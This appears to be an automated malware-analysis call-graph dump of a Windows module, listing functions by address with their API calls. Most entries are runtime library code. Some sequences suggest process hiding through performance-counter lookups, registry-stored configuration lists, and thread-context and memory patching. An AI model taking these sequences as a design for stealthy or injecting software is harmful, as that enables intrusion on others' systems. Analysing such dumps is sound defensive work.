286d7d19d68 8339->8341 8340->8341 8341->8321 8343 286d7d19aac __vcrt_FlsAlloc 5 API calls 8342->8343 8344 286d7d19c21 TlsAlloc 8343->8344 9104 286d7d1820c 9111 286d7d18f34 9104->9111 9110 286d7d18219 9112 286d7d19340 _CreateFrameInfo 9 API calls 9111->9112 9113 286d7d18215 9112->9113 9113->9110 9114 286d7d1c288 9113->9114 9115 286d7d1cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9114->9115 9116 286d7d18222 9115->9116 9116->9110 9117 286d7d18f48 9116->9117 9120 286d7d192dc 9117->9120 9119 286d7d18f51 9119->9110 9121 286d7d192ed 9120->9121 9125 286d7d19302 9120->9125 9122 286d7d19c8c _CreateFrameInfo 6 API calls 9121->9122 9123 286d7d192f2 9122->9123 9126 286d7d19cd4 9123->9126 9125->9119 9127 286d7d19aac __vcrt_FlsAlloc 5 API calls 9126->9127 9128 286d7d19d02 9127->9128 9129 286d7d19d0c 9128->9129 9130 286d7d19d14 TlsSetValue 9128->9130 9129->9125 9130->9129 8346 286d7d1c510 8347 286d7d1c518 8346->8347 8348 286d7d1c545 8347->8348 8350 286d7d1c574 8347->8350 8351 286d7d1c59f 8350->8351 8352 286d7d1c582 DeleteCriticalSection 8351->8352 8353 286d7d1c5a3 8351->8353 8352->8351 8353->8348 9131 286d7d24611 __scrt_dllmain_exception_filter 8552 286d7d134b8 8553 286d7d134e8 8552->8553 8554 286d7d135a1 8553->8554 8555 286d7d13505 PdhGetCounterInfoW 8553->8555 8555->8554 8556 286d7d13523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8555->8556 8557 286d7d1358d GetProcessHeap HeapFree 8556->8557 8558 286d7d13555 StrCmpW 8556->8558 8557->8554 8558->8557 8559 286d7d1356a 8558->8559 8559->8557 8560 286d7d13950 12 API calls 8559->8560 8560->8559 7467 286d7d11e3c LoadLibraryA GetProcAddress 7468 286d7d11e6f 7467->7468 7469 286d7d11e62 SleepEx 7467->7469 7469->7469 8354 286d7d1ff40 8355 286d7d1ff4b 8354->8355 8363 286d7d22c24 8355->8363 8376 286d7d1c558 EnterCriticalSection 8363->8376 9132 286d7d1f440 GetProcessHeap 7809 286d7d181c0 7810 286d7d181c9 __scrt_release_startup_lock 7809->7810 7812 286d7d181cd 7810->7812 7813 286d7d1bbb4 7810->7813 7814 286d7d1bbd4 7813->7814 7824 286d7d1bbed 7813->7824 7815 286d7d1bbdc 7814->7815 7816 286d7d1bbf2 7814->7816 7817 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7815->7817 7842 286d7d1e864 7816->7842 7819 286d7d1bbe1 7817->7819 7821 286d7d1d04c _invalid_parameter_noinfo 38 API calls 7819->7821 7821->7824 7824->7812 7829 286d7d1bc69 7831 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7829->7831 7830 286d7d1bc7a 7832 286d7d1b994 14 API calls 7830->7832 7841 286d7d1bc6e 7831->7841 7833 286d7d1bc96 7832->7833 7835 286d7d1bcc6 7833->7835 7836 286d7d1bcdf 7833->7836 7833->7841 7834 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7834->7824 7837 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7835->7837 7839 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7836->7839 7838 286d7d1bccf 7837->7838 7840 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7838->7840 7839->7841 7840->7824 7841->7834 7843 286d7d1e871 7842->7843 7847 286d7d1bbf7 7842->7847 7872 286d7d1cacc 7843->7872 7845 286d7d1e8a0 7877 286d7d1e53c 7845->7877 7848 286d7d1df38 GetModuleFileNameW 7847->7848 7849 286d7d1df7d GetLastError 7848->7849 7850 286d7d1df91 7848->7850 8052 286d7d1d184 7849->8052 7852 286d7d1dd78 14 API calls 7850->7852 7854 286d7d1dfbf 7852->7854 7853 286d7d1df8a 7856 286d7d18070 _invalid_parameter_noinfo 8 API calls 7853->7856 7857 286d7d1dfd0 7854->7857 8057 286d7d1f198 7854->8057 7859 286d7d1bc0e 7856->7859 8061 286d7d1de1c 7857->8061 7860 286d7d1b994 7859->7860 7862 286d7d1b9d2 7860->7862 7864 286d7d1ba38 7862->7864 8078 286d7d1ec1c 7862->8078 7863 286d7d1bb25 7866 286d7d1bb54 7863->7866 7864->7863 7865 286d7d1ec1c 14 API calls 7864->7865 7865->7864 7867 286d7d1bba4 7866->7867 7868 286d7d1bb6c 7866->7868 7867->7829 7867->7830 7868->7867 7869 286d7d1d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7868->7869 7870 286d7d1bb9a 7869->7870 7871 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7870->7871 7871->7867 7873 286d7d1cae8 FlsGetValue 7872->7873 7874 286d7d1cae4 7872->7874 7873->7874 7875 286d7d1cafe 7874->7875 7876 286d7d1c940 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7874->7876 7875->7845 7876->7875 7900 286d7d1e7ac 7877->7900 7884 286d7d1e5b6 7926 286d7d1e8e0 7884->7926 7885 286d7d1e5a7 7886 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7885->7886 7897 286d7d1e58e 7886->7897 7889 286d7d1e6b2 7890 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7889->7890 7891 286d7d1e6b7 7890->7891 7893 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7891->7893 7892 286d7d1e70d 7895 286d7d1e774 7892->7895 7937 286d7d1e05c 7892->7937 7893->7897 7894 286d7d1e6cc 7894->7892 7898 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7894->7898 7896 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7895->7896 7896->7897 7897->7847 7898->7892 7901 286d7d1e7cf 7900->7901 7908 286d7d1e7d9 7901->7908 7952 286d7d1c558 EnterCriticalSection 7901->7952 7907 286d7d1e571 7912 286d7d1e22c 7907->7912 7908->7907 7909 286d7d1cacc 14 API calls 7908->7909 7910 286d7d1e8a0 7909->7910 7911 286d7d1e53c 56 API calls 7910->7911 7911->7907 7913 286d7d1dd78 14 API calls 7912->7913 7914 286d7d1e240 7913->7914 7915 286d7d1e24c GetOEMCP 7914->7915 7916 286d7d1e25e 7914->7916 7918 286d7d1e273 7915->7918 7917 286d7d1e263 GetACP 7916->7917 7916->7918 7917->7918 7918->7897 7919 286d7d1c5d0 7918->7919 7920 286d7d1c61b 7919->7920 7924 286d7d1c5df Concurrency::details::SchedulerProxy::DeleteThis 7919->7924 7922 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7920->7922 7921 286d7d1c602 HeapAlloc 7923 286d7d1c619 7921->7923 7921->7924 7922->7923 7923->7884 7923->7885 7924->7920 7924->7921 7925 286d7d1b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 7924->7925 7925->7924 7927 286d7d1e22c 16 API calls 7926->7927 7928 286d7d1e91b 7927->7928 7929 286d7d1ea71 7928->7929 7931 286d7d1e958 IsValidCodePage 7928->7931 7935 286d7d1e972 7928->7935 7930 286d7d18070 _invalid_parameter_noinfo 8 API calls 7929->7930 7932 286d7d1e6a9 7930->7932 7931->7929 7933 286d7d1e969 7931->7933 7932->7889 7932->7894 7934 286d7d1e998 GetCPInfo 7933->7934 7933->7935 7934->7929 7934->7935 7953 286d7d1e344 7935->7953 8051 286d7d1c558 EnterCriticalSection 7937->8051 7954 286d7d1e38f GetCPInfo 7953->7954 7963 286d7d1e485 7953->7963 7955 286d7d1e3a2 7954->7955 7954->7963 7964 286d7d21474 7955->7964 7956 286d7d18070 _invalid_parameter_noinfo 8 API calls 7957 286d7d1e524 7956->7957 7957->7929 7963->7956 7965 286d7d1dd78 14 API calls 7964->7965 7966 286d7d214b6 7965->7966 7984 286d7d1ec58 7966->7984 7986 286d7d1ec61 MultiByteToWideChar 7984->7986 8075 286d7d1d1d0 8052->8075 8054 286d7d1d191 Concurrency::details::SchedulerProxy::DeleteThis 8055 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8054->8055 8056 286d7d1d1a1 8055->8056 8056->7853 8058 286d7d1f1ca 8057->8058 8059 286d7d1f1a9 8057->8059 8058->7857 8059->8058 8060 286d7d1ef88 9 API calls 8059->8060 8060->8058 8062 286d7d1de5b 8061->8062 8067 286d7d1de40 8061->8067 8063 286d7d1ece8 WideCharToMultiByte 8062->8063 8070 286d7d1de60 8062->8070 8064 286d7d1deb7 8063->8064 8066 286d7d1debe GetLastError 8064->8066 8069 286d7d1dee9 8064->8069 8064->8070 8065 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8065->8067 8068 286d7d1d184 13 API calls 8066->8068 8067->7853 8072 286d7d1decb 8068->8072 8071 286d7d1ece8 WideCharToMultiByte 8069->8071 8070->8065 8070->8067 8073 286d7d1df10 8071->8073 8074 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8072->8074 8073->8066 8073->8067 8074->8067 8076 286d7d1cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8075->8076 8077 286d7d1d1d9 8076->8077 8077->8054 8079 286d7d1eba8 8078->8079 8080 286d7d1dd78 14 API calls 8079->8080 8081 286d7d1ebcc 8080->8081 8081->7862 9133 286d7d1ae42 9134 286d7d19324 _CreateFrameInfo 9 API calls 9133->9134 9136 286d7d1ae4f __CxxCallCatchBlock 9134->9136 9135 286d7d1ae93 RaiseException 9137 286d7d1aeba 9135->9137 9136->9135 9138 286d7d19978 __CxxCallCatchBlock 9 API calls 9137->9138 9143 286d7d1aec2 9138->9143 9139 286d7d1aeeb __CxxCallCatchBlock 9140 286d7d19324 _CreateFrameInfo 9 API calls 9139->9140 9141 286d7d1aefe 9140->9141 9142 286d7d19324 _CreateFrameInfo 9 API calls 9141->9142 9144 286d7d1af07 9142->9144 9143->9139 9145 286d7d18ff8 __CxxCallCatchBlock 9 API calls 9143->9145 9145->9139 8082 286d7d247c2 8091 286d7d19978 8082->8091 8084 286d7d24814 __CxxCallCatchBlock 8085 286d7d19324 _CreateFrameInfo 9 API calls 8084->8085 8086 286d7d24828 8085->8086 8088 286d7d19324 _CreateFrameInfo 9 API calls 8086->8088 8089 286d7d24838 8088->8089 8092 286d7d19324 _CreateFrameInfo 9 API calls 8091->8092 8093 286d7d1998a 8092->8093 8094 286d7d199c5 8093->8094 8095 286d7d19324 _CreateFrameInfo 9 API calls 8093->8095 8096 286d7d19995 8095->8096 8096->8094 8097 286d7d19324 _CreateFrameInfo 9 API calls 8096->8097 8098 286d7d199b6 8097->8098 8098->8084 8099 286d7d18ff8 8098->8099 8100 286d7d19324 _CreateFrameInfo 9 API calls 8099->8100 8101 286d7d19006 8100->8101 8101->8084 7470 286d7d11bc4 7477 286d7d11724 GetProcessHeap HeapAlloc 7470->7477 7472 286d7d11bda SleepEx 7473 286d7d11724 50 API calls 7472->7473 7475 286d7d11bd3 7473->7475 7475->7472 7476 286d7d1159c StrCmpIW StrCmpW 7475->7476 7528 286d7d119b0 7475->7528 7476->7475 7545 286d7d11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7477->7545 7479 286d7d1174c 7546 286d7d11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7479->7546 7481 286d7d11754 7547 286d7d11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7481->7547 7483 286d7d1175d 7548 286d7d11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7483->7548 7485 286d7d11766 7549 286d7d11264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7485->7549 7487 286d7d1176f 7550 286d7d11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7487->7550 7489 286d7d11778 7551 286d7d11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7489->7551 7491 286d7d11781 7552 286d7d11000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7491->7552 7493 286d7d1178a RegOpenKeyExW 7494 286d7d117bc RegOpenKeyExW 7493->7494 7495 286d7d119a2 7493->7495 7496 286d7d117fb RegOpenKeyExW 7494->7496 7497 286d7d117e5 7494->7497 7495->7475 7499 286d7d11836 RegOpenKeyExW 7496->7499 7500 286d7d1181f 7496->7500 7553 286d7d112b8 RegQueryInfoKeyW 7497->7553 7503 286d7d1185a 7499->7503 7504 286d7d11871 RegOpenKeyExW 7499->7504 7562 286d7d1104c RegQueryInfoKeyW 7500->7562 7506 286d7d112b8 16 API calls 7503->7506 7507 286d7d118ac RegOpenKeyExW 7504->7507 7508 286d7d11895 7504->7508 7511 286d7d11867 RegCloseKey 7506->7511 7509 286d7d118e7 RegOpenKeyExW 7507->7509 7510 286d7d118d0 7507->7510 7512 286d7d112b8 16 API calls 7508->7512 7514 286d7d1190b 7509->7514 7515 286d7d11922 RegOpenKeyExW 7509->7515 7513 286d7d112b8 16 API calls 7510->7513 7511->7504 7516 286d7d118a2 RegCloseKey 7512->7516 7517 286d7d118dd RegCloseKey 7513->7517 7518 286d7d1104c 6 API calls 7514->7518 7519 286d7d11946 7515->7519 7520 286d7d1195d RegOpenKeyExW 7515->7520 7516->7507 7517->7509 7521 286d7d11918 RegCloseKey 7518->7521 7522 286d7d1104c 6 API calls 7519->7522 7523 286d7d11998 RegCloseKey 7520->7523 7524 286d7d11981 7520->7524 7521->7515 7525 286d7d11953 RegCloseKey 7522->7525 7523->7495 7526 286d7d1104c 6 API calls 7524->7526 7525->7520 7527 286d7d1198e RegCloseKey 7526->7527 7527->7523 7572 286d7d114a0 7528->7572 7545->7479 7546->7481 7547->7483 7548->7485 7549->7487 7550->7489 7551->7491 7552->7493 7554 286d7d11486 RegCloseKey 7553->7554 7555 286d7d11323 GetProcessHeap HeapAlloc 7553->7555 7554->7496 7556 286d7d1134e RegEnumValueW 7555->7556 7557 286d7d11472 GetProcessHeap HeapFree 7555->7557 7559 286d7d113a1 7556->7559 7557->7554 7559->7556 7559->7557 7560 286d7d1141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7559->7560 7561 286d7d113cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7559->7561 7567 286d7d11530 7559->7567 7560->7559 7561->7560 7563 286d7d111b5 RegCloseKey 7562->7563 7565 286d7d110bf 7562->7565 7563->7499 7564 286d7d110cf RegEnumValueW 7564->7565 7565->7563 7565->7564 7566 286d7d1114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7565->7566 7566->7565 7568 286d7d11580 7567->7568 7571 286d7d1154a 7567->7571 7568->7559 7569 286d7d11569 StrCmpW 7569->7571 7570 286d7d11561 StrCmpIW 7570->7571 7571->7568 7571->7569 7571->7570 7573 286d7d114e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7572->7573 7574 286d7d114c2 GetProcessHeap HeapFree 7572->7574 7574->7573 7574->7574 8102 286d7d20fa8 8103 286d7d20fcc 8102->8103 8104 286d7d18070 _invalid_parameter_noinfo 8 API calls 8103->8104 8105 286d7d2100e 8104->8105 9146 286d7d1c828 9147 286d7d1c82d 9146->9147 9151 286d7d1c842 9146->9151 9152 286d7d1c848 9147->9152 9153 286d7d1c892 9152->9153 9154 286d7d1c88a 9152->9154 9156 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9153->9156 9155 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9154->9155 9155->9153 9157 286d7d1c89f 9156->9157 9158 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9157->9158 9159 286d7d1c8ac 9158->9159 9160 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9159->9160 9161 286d7d1c8b9 9160->9161 9162 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9161->9162 9163 286d7d1c8c6 9162->9163 9164 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9163->9164 9165 286d7d1c8d3 9164->9165 9166 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9165->9166 9167 286d7d1c8e0 9166->9167 9168 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9167->9168 9169 286d7d1c8ed 9168->9169 9170 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9169->9170 9171 286d7d1c8fd 9170->9171 9172 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9171->9172 9173 286d7d1c90d 9172->9173 9178 286d7d1c6f8 9173->9178 9192 286d7d1c558 EnterCriticalSection 9178->9192 8106 286d7d133a8 8107 286d7d133cf 8106->8107 8108 286d7d1349c 8107->8108 8109 286d7d133ec PdhGetCounterInfoW 8107->8109 8109->8108 8110 286d7d1340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 8109->8110 8111 286d7d13488 GetProcessHeap HeapFree 8110->8111 8112 286d7d13440 StrCmpW 8110->8112 8111->8108 8112->8111 8114 286d7d13455 8112->8114 8114->8111 8115 286d7d13950 StrCmpNW 8114->8115 8116 286d7d13982 StrStrW 8115->8116 8119 286d7d139f2 8115->8119 8117 286d7d1399b StrToIntW 8116->8117 8116->8119 8118 286d7d139c3 8117->8118 8117->8119 8118->8119 8125 286d7d11a30 OpenProcess 8118->8125 8119->8114 8126 286d7d11ab6 8125->8126 8127 286d7d11a64 K32GetModuleFileNameExW 8125->8127 8126->8119 8131 286d7d13f88 8126->8131 8128 286d7d11aad CloseHandle 8127->8128 8129 286d7d11a7e PathFindFileNameW lstrlenW 8127->8129 8128->8126 8129->8128 8130 286d7d11a9c StrCpyW 8129->8130 8130->8128 8132 286d7d139e4 8131->8132 8133 286d7d13f95 StrCmpNIW 8131->8133 8132->8119 8134 286d7d11cfc 8132->8134 8133->8132 8135 286d7d11d13 8134->8135 8136 286d7d11d1c 8134->8136 8137 286d7d11530 2 API calls 8135->8137 8136->8119 8137->8136 8377 286d7d1872c 8380 286d7d190c0 8377->8380 8379 286d7d18755 8381 286d7d190e1 8380->8381 8382 286d7d19116 8380->8382 8381->8382 8384 286d7d1c328 8381->8384 8382->8379 8385 286d7d1c33f 8384->8385 8386 286d7d1c335 8384->8386 8387 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8385->8387 8386->8385 8388 286d7d1c35a 8386->8388 8392 286d7d1c346 8387->8392 8389 286d7d1c352 8388->8389 8391 286d7d1d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8388->8391 8389->8382 8390 286d7d1d04c _invalid_parameter_noinfo 38 API calls 8390->8389 8391->8392 8392->8390 8561 286d7d1aaac 8562 286d7d1aad9 __except_validate_context_record 8561->8562 8563 286d7d19324 _CreateFrameInfo 9 API calls 8562->8563 8564 286d7d1aade 8563->8564 8566 286d7d1ab38 8564->8566 8569 286d7d1abc6 8564->8569 8575 286d7d1ab8c 8564->8575 8565 286d7d1ac34 8565->8575 8603 286d7d1a22c 8565->8603 8567 286d7d1abb3 8566->8567 8566->8575 8576 286d7d1ab5a __GetCurrentState 8566->8576 8590 286d7d195d0 8567->8590 8572 286d7d1abe5 8569->8572 8597 286d7d199cc 8569->8597 8572->8565 8572->8575 8600 286d7d199e0 8572->8600 8573 286d7d1acdd 8576->8573 8578 286d7d1afb8 8576->8578 8579 286d7d199cc Is_bad_exception_allowed 9 API calls 8578->8579 8580 286d7d1afe7 __GetCurrentState 8579->8580 8581 286d7d19324 _CreateFrameInfo 9 API calls 8580->8581 8586 286d7d1b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8581->8586 8582 286d7d1b0fb 8583 286d7d19324 _CreateFrameInfo 9 API calls 8582->8583 8584 286d7d1b100 8583->8584 8585 286d7d19324 _CreateFrameInfo 9 API calls 8584->8585 8587 286d7d1b10b __FrameHandler3::GetHandlerSearchState 8584->8587 8585->8587 8586->8582 8586->8587 8588 286d7d199cc 9 API calls Is_bad_exception_allowed 8586->8588 8589 286d7d199f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8586->8589 8587->8575 8588->8586 8589->8586 8660 286d7d19634 8590->8660 8592 286d7d195ef __FrameHandler3::GetHandlerSearchState 8664 286d7d19540 8592->8664 8595 286d7d1afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8596 286d7d19624 8595->8596 8596->8575 8598 286d7d19324 _CreateFrameInfo 9 API calls 8597->8598 8599 286d7d199d5 8598->8599 8599->8572 8601 286d7d19324 _CreateFrameInfo 9 API calls 8600->8601 8602 286d7d199e9 8601->8602 8602->8565 8668 286d7d1b144 8603->8668 8605 286d7d1a6f4 8606 286d7d1a645 8606->8605 8646 286d7d1a643 8606->8646 8721 286d7d1a6fc 8606->8721 8607 286d7d1a373 8607->8606 8617 286d7d1a3ab 8607->8617 8608 286d7d19324 _CreateFrameInfo 9 API calls 8612 286d7d1a687 8608->8612 8610 286d7d19324 _CreateFrameInfo 9 API calls 8614 286d7d1a2da 8610->8614 8612->8605 8615 286d7d18070 _invalid_parameter_noinfo 8 API calls 8612->8615 8613 286d7d1a575 8616 286d7d1a592 8613->8616 8620 286d7d199cc Is_bad_exception_allowed 9 API calls 8613->8620 8613->8646 8614->8612 8618 286d7d19324 _CreateFrameInfo 9 API calls 8614->8618 8619 286d7d1a69a 8615->8619 8623 286d7d1a5b4 8616->8623 8616->8646 8714 286d7d195a4 8616->8714 8617->8613 8645 286d7d199e0 9 API calls 8617->8645 8693 286d7d1a96c 8617->8693 8707 286d7d1a158 8617->8707 8622 286d7d1a2ea 8618->8622 8619->8575 8620->8616 8624 286d7d19324 _CreateFrameInfo 9 API calls 8622->8624 8625 286d7d1a5ca 8623->8625 8623->8646 8657 286d7d1a6d7 8623->8657 8626 286d7d1a2f3 8624->8626 8629 286d7d199cc Is_bad_exception_allowed 9 API calls 8625->8629 8632 286d7d1a5d5 8625->8632 8679 286d7d19a0c 8626->8679 8627 286d7d19324 _CreateFrameInfo 9 API calls 8630 286d7d1a6dd 8627->8630 8629->8632 8633 286d7d19324 _CreateFrameInfo 9 API calls 8630->8633 8634 286d7d1b1dc 9 API calls 8632->8634 8635 286d7d1a6e6 8633->8635 8636 286d7d1a5eb 8634->8636 8638 286d7d1c2f4 14 API calls 8635->8638 8640 286d7d19634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8636->8640 8636->8646 8637 286d7d19324 _CreateFrameInfo 9 API calls 8639 286d7d1a335 8637->8639 8638->8605 8639->8607 8641 286d7d19324 _CreateFrameInfo 9 API calls 8639->8641 8642 286d7d1a605 8640->8642 8644 286d7d1a341 8641->8644 8718 286d7d19838 RtlUnwindEx 8642->8718 8647 286d7d19324 _CreateFrameInfo 9 API calls 8644->8647 8645->8617 8646->8608 8648 286d7d1a34a 8647->8648 8682 286d7d1b1dc 8648->8682 8653 286d7d1a35e 8689 286d7d1b2cc 8653->8689 8655 286d7d1a6d1 8656 286d7d1c2f4 14 API calls 8655->8656 8656->8657 8657->8627 8658 286d7d1a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8658->8655 8659 286d7d19178 Concurrency::cancel_current_task 2 API calls 8658->8659 8659->8655 8661 286d7d19662 __FrameHandler3::GetHandlerSearchState 8660->8661 8662 286d7d196d4 8661->8662 8663 286d7d1968c RtlLookupFunctionEntry 8661->8663 8662->8592 8663->8661 8665 286d7d1958b 8664->8665 8666 286d7d19560 8664->8666 8665->8595 8666->8665 8667 286d7d19324 _CreateFrameInfo 9 API calls 8666->8667 8667->8666 8669 286d7d1b169 __FrameHandler3::GetHandlerSearchState 8668->8669 8670 286d7d19634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8669->8670 8671 286d7d1b17e 8670->8671 8733 286d7d19db4 8671->8733 8674 286d7d1b190 __FrameHandler3::GetHandlerSearchState 8736 286d7d19dec 8674->8736 8675 286d7d1b1b3 8676 286d7d19db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8675->8676 8677 286d7d1a28e 8676->8677 8677->8605 8677->8607 8677->8610 8680 286d7d19324 _CreateFrameInfo 9 API calls 8679->8680 8681 286d7d19a1a 8680->8681 8681->8605 8681->8637 8683 286d7d1b2c3 8682->8683 8687 286d7d1b207 8682->8687 8684 286d7d1a35a 8684->8607 8684->8653 8685 286d7d199e0 9 API calls 8685->8687 8686 286d7d199cc Is_bad_exception_allowed 9 API calls 8686->8687 8687->8684 8687->8685 8687->8686 8688 286d7d1a96c 9 API calls 8687->8688 8688->8687 8690 286d7d1b339 8689->8690 8692 286d7d1b2e9 Is_bad_exception_allowed 8689->8692 8690->8658 8691 286d7d199cc 9 API calls Is_bad_exception_allowed 8691->8692 8692->8690 8692->8691 8694 286d7d1a999 8693->8694 8706 286d7d1aa28 8693->8706 8695 286d7d199cc Is_bad_exception_allowed 9 API calls 8694->8695 8696 286d7d1a9a2 8695->8696 8697 286d7d199cc Is_bad_exception_allowed 9 API calls 8696->8697 8698 286d7d1a9bb 8696->8698 8696->8706 8697->8698 8699 286d7d1a9e7 8698->8699 8700 286d7d199cc Is_bad_exception_allowed 9 API calls 8698->8700 8698->8706 8701 286d7d199e0 9 API calls 8699->8701 8700->8699 8702 286d7d1a9fb 8701->8702 8703 286d7d199cc Is_bad_exception_allowed 9 API calls 8702->8703 8704 286d7d1aa14 8702->8704 8702->8706 8703->8704 8705 286d7d199e0 9 API calls 8704->8705 8705->8706 8706->8617 8708 286d7d19634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8707->8708 8709 286d7d1a195 8708->8709 8710 286d7d199cc Is_bad_exception_allowed 9 API calls 8709->8710 8711 286d7d1a1cd 8710->8711 8712 286d7d19838 9 API calls 8711->8712 8713 286d7d1a211 8712->8713 8713->8617 8715 286d7d195b8 __FrameHandler3::GetHandlerSearchState 8714->8715 8716 286d7d19540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8715->8716 8717 286d7d195c2 8716->8717 8717->8623 8719 286d7d18070 _invalid_parameter_noinfo 8 API calls 8718->8719 8720 286d7d19932 8719->8720 8720->8646 8722 286d7d1a735 8721->8722 8727 286d7d1a948 8721->8727 8723 286d7d19324 _CreateFrameInfo 9 API calls 8722->8723 8724 286d7d1a73a 8723->8724 8725 286d7d1a759 EncodePointer 8724->8725 8731 286d7d1a7ac 8724->8731 8726 286d7d19324 _CreateFrameInfo 9 API calls 8725->8726 8728 286d7d1a769 8726->8728 8727->8646 8728->8731 8739 286d7d194ec 8728->8739 8730 286d7d199cc 9 API calls Is_bad_exception_allowed 8730->8731 8731->8727 8731->8730 8732 286d7d1a158 19 API calls 8731->8732 8732->8731 8734 286d7d19634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8733->8734 8735 286d7d19dc7 8734->8735 8735->8674 8735->8675 8737 286d7d19634 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 8736->8737 8738 286d7d19e06 8737->8738 8738->8677 8740 286d7d19324 _CreateFrameInfo 9 API calls 8739->8740 8741 286d7d19518 8740->8741 8741->8731 9194 286d7d1ec30 GetCommandLineA GetCommandLineW 9195 286d7d16430 9196 286d7d1643d 9195->9196 9197 286d7d16449 9196->9197 9203 286d7d1655a 9196->9203 9198 286d7d164cd 9197->9198 9199 286d7d164a6 SetThreadContext 9197->9199 9199->9198 9200 286d7d1663e 9202 286d7d1665e 9200->9202 9211 286d7d14b20 9200->9211 9201 286d7d16581 VirtualProtect FlushInstructionCache 9201->9203 9215 286d7d15530 GetCurrentProcess 9202->9215 9203->9200 9203->9201 9206 286d7d16663 9207 286d7d16677 ResumeThread 9206->9207 9208 286d7d166b7 9206->9208 9207->9206 9209 286d7d18070 _invalid_parameter_noinfo 8 API calls 9208->9209 9210 286d7d166ff 9209->9210 9213 286d7d14b3c 9211->9213 9212 286d7d14b9f 9212->9202 9213->9212 9214 286d7d14b52 VirtualFree 9213->9214 9214->9213 9216 286d7d1554c 9215->9216 9217 286d7d15593 9216->9217 9218 286d7d15562 VirtualProtect FlushInstructionCache 9216->9218 9217->9206 9218->9216 8393 286d7d1bd34 8394 286d7d1bd4d 8393->8394 8407 286d7d1bd49 8393->8407 8395 286d7d1e864 56 API calls 8394->8395 8396 286d7d1bd52 8395->8396 8408 286d7d1edc8 GetEnvironmentStringsW 8396->8408 8399 286d7d1bd6b 8428 286d7d1bda8 8399->8428 8400 286d7d1bd5f 8401 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8400->8401 8401->8407 8404 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8405 286d7d1bd92 8404->8405 8406 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8405->8406 8406->8407 8409 286d7d1edf8 8408->8409 8410 286d7d1bd57 8408->8410 8411 286d7d1ece8 WideCharToMultiByte 8409->8411 8410->8399 8410->8400 8412 286d7d1ee49 8411->8412 8413 286d7d1ee53 FreeEnvironmentStringsW 8412->8413 8414 286d7d1c5d0 14 API calls 8412->8414 8413->8410 8415 286d7d1ee63 8414->8415 8416 286d7d1ee6b 8415->8416 8417 286d7d1ee74 8415->8417 8419 286d7d1d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8416->8419 8418 286d7d1ece8 WideCharToMultiByte 8417->8418 8420 286d7d1ee97 8418->8420 8421 286d7d1ee72 8419->8421 8422 286d7d1ee9b 8420->8422 8423 286d7d1eea5 8420->8423 